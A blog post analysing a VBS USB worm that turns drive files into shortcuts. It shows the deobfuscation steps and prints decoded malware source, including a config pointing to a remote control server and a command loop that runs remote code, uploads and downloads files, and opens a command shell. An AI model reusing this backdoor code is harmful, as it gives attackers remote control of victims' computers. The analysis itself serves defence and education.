Dissecting a USB Virus

Sample folders that changed into windows shortcuts.

One day last month, after plugging in one of my USB drives into a school computer, all of the files and folders in the drive were converted to .lnk files.

Instinct told me something shady was going on.

One month later, I decided to look into the problem. After scanning the drive with my antivirus, it detected a virus of the type: VBS/Agent.PA.

Antivirus detection.

Well, where’s all the fun if you just quarantine a computer virus? Nowadays we don’t get as many viruses; my antivirus pretty much just perform updates. Now we have a real virus out from the wild, I decided to move the virus out of the quarantine and investigate deeper.

Dissecting the virus

system.wSf virus in all its glory.

The quarantined file was named “system.wSf”. The first things developers do when receiving suspicious files? Open it up in a text editor (or hex editor or…) (and of course, identify the filetype first…).

Using editor features to highlight variables that are of the same name.

Oof. The orange text hurts eyes! And the gibberish. Thank goodness that Notepad++ is able to highlight variables that are of the same name. I personally think the authors of this virus deliberately hide variable names to let it evade antivirus (can change variable names often by updating the virus remotely as we see below).

Opening system.wSf. Oof!

We can see that it is a Visual Basic Script (VBS). After analyzing for a while, I roughly organize system.wSf into two parts:

  1. Decryption and execution (red box in photo)
  2. Encrypted data containing script (blue box in photo)

Decryption and execution

Line 9-24 decrypts lines 25-34 and then execute them as a Visual Basic Script. In detail, lines 25-34 are copied line by line into the string GifBgBUICSNdFVIHIiGfIiGIIDGkiBIIjffFiOIlCifCIiVfIHBUGg and then passed into the function gIoOOOkldiIGGBdFgGiigdiGiolSif. This function is the meat of the decryption part; it reverses a string and then executes it (with ExecuteGlobal()). Simple scheme, but enough to obscure virus functionalities.

Decryption function of the virus.

Looking into the encrypted data…

I used a small Python script to concatenate and then reverse lines 25-34 myself:

with open("line25_34.txt") as f:
	l = ""
	for x in f:
		l = l + "\n\r" + x
print(l[::-1])

Lines 25 – 34 then is decrypted into the following photo. Some notes come into mind:

  • There seems to be another set of encryption using split() and chr() to decrypt the virus.
  • The single quotes at the end of the line are comments. An interesting way to convert comments into code!
Virus Payload.

So basically, the (79,228 characters) long string oSoiFGIuKGFKgkgCKIgfCFjkoRGdRR is split by "BoI" and then the numbers in between are converted into characters (think ASCII number representation to char). Also using Python, we finally get to the essence of the virus:

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "hostlan.ddns.net"
port = 9999
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
...
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
...
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param)
case  "exit-process"
      param = cmd (1)
      exitprocess (param)
case  "sleep"
      param = cmd (1)
      sleep = eval (param)
end select

wscript.sleep sleep

wend
...

What the virus could do

Since the original script is very long, I will only highlight select subroutines in the virus and put the original file in a link below. It looks like the virus executes a big while true loop and connects to a server every 5 seconds to ask for commands to execute. Commands include “execute”, “update”, “uninstall”, “exit-process” (terminate a running process on the infected computer) etc.

Execute

case "excecute"
      param = cmd (1)
      execute param

This would execute VBS code sent from the server. Should be plain text enough to understand.

Update

case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit

Interesting how the virus program can overwrite itself and update to a newer version. Perhaps to evade antivirus?

Uninstall

This command is interesting. It also gives us a clue on how we can remove the virus from an infected computer by ourselves. It deletes a couple of windows registries and the virus at its install locations. Most importantly, the for loop sets folder and file attributes on external drives back to normal.

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path)
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

Exit-process

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

This is a small subroutine that would invoke the shell and run taskkill on a certain PID.

Conclusion and Remarks

It was interesting to get my hands on board a real virus. A couple of thoughts:

Photo of the properties of the shortcut bait. It actually starts the virus script before opening up file explorer. Beware of the arrow!
  • Even though I figured out what the virus could do, I still do not have a clear picture of why? Does the attacker want money (e.g. ransom), utilize computing resources (e.g. botnet)? Or is the attacker targeting a specific entity? Only implanting the virus on a machine and requesting from the server would we know.
  • The virus spreads mainly through USB drives. Really be an active observer, keep alert and enforce your common sense to stay away from these kinds of viruses (the arrow on the icon is very, very important!) Viruses like these leverage on human ignorance.
  • If infected, disconnect the computer from the internet and remove the virus via the uninstall subroutine in the script. You could also use a .bat script here to remove the virus.

You can download the virus script below – it is unmodified so I changed the filetype to .txt to prevent it from running automatically:


Comments

Leave a Reply

Your email address will not be published. Required fields are marked *